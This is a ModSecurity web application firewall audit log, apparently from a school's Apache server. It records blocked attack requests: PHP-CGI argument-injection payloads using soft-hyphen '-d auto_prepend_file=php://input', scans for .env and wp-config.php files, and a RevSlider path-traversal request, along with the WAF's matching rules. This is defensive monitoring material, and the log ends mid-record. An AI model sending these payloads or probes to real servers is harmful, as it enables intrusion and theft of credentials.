[29/Apr/2025:10:28:24 +0700] aBBHWKmWspnM_fF1r_6BKAAAAAg 103.236.140.4 57040 103.236.140.4 8181
--b060e937-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 8.215.76.183
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 8.215.76.183
X-Forwarded-Proto: https
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--b060e937-C--
--b060e937-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b060e937-E--
--b060e937-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745897304154375 4549 (- - -)
Stopwatch2: 1745897304154375 4549; combined=3167, p1=481, p2=2650, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b060e937-Z--
--e4eeeb78-A--
[29/Apr/2025:10:33:55 +0700] aBBIo8DCAfZpkPvVAPO12gAAAJQ 103.236.140.4 58412 103.236.140.4 8181
--e4eeeb78-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.137.162
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.137.162
X-Forwarded-Proto: http
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
Accept: */*
Content-Type: application/x-www-form-urlencoded
--e4eeeb78-C--
--e4eeeb78-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e4eeeb78-E--
--e4eeeb78-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745897635978294 4137 (- - -)
Stopwatch2: 1745897635978294 4137; combined=2819, p1=472, p2=2317, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e4eeeb78-Z--
--fd72db24-A--
[29/Apr/2025:14:14:30 +0700] aBB8VgW3ctMdWeqW3LPCMwAAAEM 103.236.140.4 54198 103.236.140.4 8181
--fd72db24-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.34
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.34
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36
Accept-Charset: utf-8
--fd72db24-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fd72db24-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745910870185125 797 (- - -)
Stopwatch2: 1745910870185125 797; combined=368, p1=336, p2=0, p3=0, p4=0, p5=32, sr=120, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fd72db24-Z--
--a0094867-A--
[29/Apr/2025:14:47:38 +0700] aBCEGqmWspnM_fF1r_6W7QAAABM 103.236.140.4 34038 103.236.140.4 8181
--a0094867-B--
GET /wp-config.phpold HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 82.165.86.35
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 82.165.86.35
X-Forwarded-Proto: http
Connection: close
Accept: */*
--a0094867-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a0094867-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745912858028460 846 (- - -)
Stopwatch2: 1745912858028460 846; combined=336, p1=288, p2=0, p3=0, p4=0, p5=48, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a0094867-Z--
--c5925c00-A--
[29/Apr/2025:14:47:39 +0700] aBCEG8DCAfZpkPvVAPPDuQAAAJE 103.236.140.4 34044 103.236.140.4 8181
--c5925c00-B--
GET /wp-config.php1 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 74.208.59.85
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 74.208.59.85
X-Forwarded-Proto: http
Connection: close
Accept: */*
--c5925c00-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c5925c00-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745912859212386 788 (- - -)
Stopwatch2: 1745912859212386 788; combined=280, p1=241, p2=0, p3=0, p4=0, p5=38, sr=72, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c5925c00-Z--
--4b2e8379-A--
[29/Apr/2025:15:38:09 +0700] aBCP8VaiXvaz3oCHN0jBZgAAAMQ 103.236.140.4 45810 103.236.140.4 8181
--4b2e8379-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Le X620 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36
Accept-Charset: utf-8
--4b2e8379-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4b2e8379-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745915889738823 774 (- - -)
Stopwatch2: 1745915889738823 774; combined=319, p1=281, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4b2e8379-Z--
--052dc72d-A--
[29/Apr/2025:16:21:39 +0700] aBCaI8DCAfZpkPvVAPPRwwAAAIE 103.236.140.4 43532 103.236.140.4 8181
--052dc72d-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 167.99.106.105
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 167.99.106.105
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--052dc72d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--052dc72d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745918499063557 816 (- - -)
Stopwatch2: 1745918499063557 816; combined=384, p1=346, p2=0, p3=0, p4=0, p5=38, sr=120, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--052dc72d-Z--
--5880d241-A--
[29/Apr/2025:17:09:27 +0700] aBClV511ysLXBHLtLPV_zAAAAEI 103.236.140.4 42008 103.236.140.4 8181
--5880d241-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.175
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.175
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept-Charset: utf-8
--5880d241-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5880d241-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745921367769504 870 (- - -)
Stopwatch2: 1745921367769504 870; combined=332, p1=297, p2=0, p3=0, p4=0, p5=35, sr=113, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5880d241-Z--
--6c00622c-A--
[29/Apr/2025:18:01:21 +0700] aBCxgRmWB8ZGI9fN-VFUHgAAAI4 103.236.140.4 34518 103.236.140.4 8181
--6c00622c-B--
GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.194
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.194
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--6c00622c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6c00622c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745924481372882 1113 (- - -)
Stopwatch2: 1745924481372882 1113; combined=392, p1=348, p2=0, p3=0, p4=0, p5=43, sr=79, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6c00622c-Z--
--c318f211-A--
[29/Apr/2025:18:01:22 +0700] aBCxgp11ysLXBHLtLPWdRQAAAFA 103.236.140.4 34520 103.236.140.4 8181
--c318f211-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.194
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.194
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--c318f211-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c318f211-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745924482134512 761 (- - -)
Stopwatch2: 1745924482134512 761; combined=263, p1=229, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c318f211-Z--
--40f1780f-A--
[29/Apr/2025:18:01:22 +0700] aBCxghmWB8ZGI9fN-VFUHwAAAI8 103.236.140.4 34526 103.236.140.4 8181
--40f1780f-B--
GET /api/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.194
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.194
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--40f1780f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--40f1780f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745924482494872 727 (- - -)
Stopwatch2: 1745924482494872 727; combined=267, p1=231, p2=0, p3=0, p4=0, p5=36, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--40f1780f-Z--
--76b9624d-A--
[29/Apr/2025:18:01:22 +0700] aBCxgrM38gUEppT2vWM7ZgAAAMk 103.236.140.4 34528 103.236.140.4 8181
--76b9624d-B--
GET /laravel/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.194
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.194
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--76b9624d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--76b9624d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745924482850568 761 (- - -)
Stopwatch2: 1745924482850568 761; combined=259, p1=226, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--76b9624d-Z--
--4498cc47-A--
[29/Apr/2025:18:01:23 +0700] aBCxgyUYsqS7mE9-0zokGwAAAA4 103.236.140.4 34534 103.236.140.4 8181
--4498cc47-B--
GET /test/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.194
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.194
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--4498cc47-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4498cc47-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745924483530510 921 (- - -)
Stopwatch2: 1745924483530510 921; combined=325, p1=293, p2=0, p3=0, p4=0, p5=32, sr=114, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4498cc47-Z--
--2f26d507-A--
[29/Apr/2025:18:01:24 +0700] aBCxhCUYsqS7mE9-0zokHAAAAAk 103.236.140.4 34536 103.236.140.4 8181
--2f26d507-B--
GET /admin/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.194
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.194
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--2f26d507-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2f26d507-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745924484363509 719 (- - -)
Stopwatch2: 1745924484363509 719; combined=300, p1=268, p2=0, p3=0, p4=0, p5=32, sr=104, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2f26d507-Z--
--67b3dc2b-A--
[29/Apr/2025:18:01:25 +0700] aBCxhSUYsqS7mE9-0zokHgAAAAo 103.236.140.4 34542 103.236.140.4 8181
--67b3dc2b-B--
GET /vendor/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.194
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.194
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--67b3dc2b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--67b3dc2b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745924485134901 857 (- - -)
Stopwatch2: 1745924485134901 857; combined=336, p1=299, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--67b3dc2b-Z--
--c7558779-A--
[29/Apr/2025:18:01:25 +0700] aBCxhSUYsqS7mE9-0zokIAAAAAw 103.236.140.4 34548 103.236.140.4 8181
--c7558779-B--
GET /sites/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.194
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.194
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--c7558779-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c7558779-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745924485935288 919 (- - -)
Stopwatch2: 1745924485935288 919; combined=357, p1=315, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c7558779-Z--
--e33e4e5f-A--
[29/Apr/2025:18:01:26 +0700] aBCxhhmWB8ZGI9fN-VFUIAAAAIE 103.236.140.4 34550 103.236.140.4 8181
--e33e4e5f-B--
GET /blog/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.194
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.194
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--e33e4e5f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e33e4e5f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745924486430877 895 (- - -)
Stopwatch2: 1745924486430877 895; combined=381, p1=344, p2=0, p3=0, p4=0, p5=37, sr=154, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e33e4e5f-Z--
--35e13616-A--
[29/Apr/2025:18:01:27 +0700] aBCxhxmWB8ZGI9fN-VFUIQAAAIw 103.236.140.4 34556 103.236.140.4 8181
--35e13616-B--
